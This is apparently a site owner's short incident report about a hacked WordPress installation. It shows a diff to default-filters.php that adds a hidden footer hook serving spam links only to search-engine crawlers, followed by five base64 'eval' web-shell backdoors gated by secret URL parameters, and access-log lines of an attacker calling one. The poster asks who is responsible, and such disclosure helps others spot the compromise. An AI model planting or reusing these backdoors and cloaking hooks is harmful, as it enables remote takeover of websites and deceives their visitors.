--- default-filters.php (revision 6) +++ default-filters.php (working copy) @@ -42,6 +42,26 @@ add_filter('comment_flood_filter', 'wp_throttle_comment_flood', 10, 3); ++add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775'); +function wpc7c16b8466d864eeefd20050625c7775() { + $seau=array("google","yahoo","slurp","msn","live","ask","altavista","aol"); + $sebot=""; foreach($seau as $ua) if(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),$ua)!==false){ $sebot="1"; break; } + if(!($sebot==1 && sizeof($_COOKIE)==0)) return; + @include('./wp-includes/class-mail.php'); + if(sizeof($wparr)>0){ + shuffle($wparr); + echo "".$_footer; + } +} +++
<?php if($_GET['f41887163354da50']=="28cbddc8f3bcd0f7"){ eval(base64_decode($_POST['file'])); exit; } ?><?php if($_GET['6fed0a04901ae41f']=="a1ceef3a748b981b"){ eval(base64_decode($_POST['file'])); exit; } ?><?php if($_GET['666a6114308099d3']=="a5522ccd36231771"){ eval(base64_decode($_POST['file'])); exit; } ?><?php if($_GET['970a0ddc6270e0ca']=="178d4b7fa8fc73a4"){ eval(base64_decode($_POST['file'])); exit; } ?><?php if($_GET['476cec30ae48ed13']=="1682480ecf14ff65"){ eval(base64_decode($_POST['file'])); exit; } ?>
Bad news. Who is responsible?
www.infonomix.org 194.110.162.23 [25/Feb/2008:07:21:06 -0500] "POST /blog/wp-includes/default-filters.php?970a0ddc6270e0ca=178d4b7fa8fc73a4 HTTP/1.1" 200 179 www.infonomix.org 194.110.162.23 [25/Feb/2008:07:21:07 -0500] "POST /blog/ HTTP/1.1" 200 27176
¥